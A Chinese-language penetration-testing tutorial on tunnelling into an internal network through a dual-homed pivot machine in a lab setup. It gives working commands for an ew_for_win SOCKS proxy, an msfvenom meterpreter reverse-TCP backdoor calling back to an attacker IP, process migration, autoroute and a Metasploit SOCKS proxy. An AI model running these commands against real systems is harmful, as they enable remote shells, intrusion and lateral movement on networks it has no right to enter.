内网隧道搭建( 内网穿透)

一、使用代理工具 ew_for_win

1、环境准备:

(1)一台双网卡虚拟机(作为跳板),能同时与攻击者主机和受害者主机通信:内网隧道搭建( 内网穿透)_第1张图片

 (2)一台攻击者主机:

内网隧道搭建( 内网穿透)_第2张图片

 (3)一台受害者者主机:

内网隧道搭建( 内网穿透)_第3张图片

2、通过文件上传,在跳板机上安装 ew_for_win.exe

(1)在跳板机上:

执行命令:

ew_for_Win.exe -s ssocksd -l 1080

(2)在攻击主机上:

用 burpsuite 设置 socks 代理:内网隧道搭建( 内网穿透)_第4张图片

(3)在攻击者主机上访问受害者主机,访问成功

二、burpsuite 设置上游代理访问内网:

1、环境准备:

(1)kali

(2)其余和上面提到的一致

2、使用 msfvenom 生成后门:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.103.130 lport=4455 -f exe > r.exe

3、把后门放到跳板机上:

4、设置 msf 监听模块:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.103.130
set lport 4455
exploit

5、跳板机运行 r.exe

6、进行进程迁移(注入):

因为获取到的 shell 的进程很脆弱,所以一般要和一些稳定的进程进行捆绑运行:

migrate 2348

6、获取到 meterpreter shell,然后设置路由:

run  autoroute -s 169.254.0.0/16

7、使用socks_proxy模块:

background
use auxiliary/server/socks_proxy
set version 4a
exploit

8、这个时候已经可以从攻击机访问到受害者主机了,但是因为使用了 192.168.103.130:1080 作为代理,就无法使用 Burpsuite 进行截包调试了,这时候可以使用代理工具 sockscap64 ,设置好代理后打开浏览器,这时候就可以正常抓包了;

你可能感兴趣的:(网络,服务器,运维)